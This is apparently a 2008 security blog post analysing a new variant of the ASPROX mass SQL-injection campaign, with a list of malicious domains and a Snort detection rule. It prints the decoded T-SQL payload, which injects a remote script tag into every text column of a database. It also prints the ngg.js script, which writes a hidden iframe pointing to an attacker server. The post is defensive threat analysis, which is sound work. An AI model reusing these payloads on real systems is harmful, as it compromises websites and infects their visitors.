Monday, July 7, 2008

ASPROX Payload Morphed NGG.JS

New domains found and new javascript payload "ngg.js" replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
}
catch(e)
{
};
}}



New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com


Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

No comments: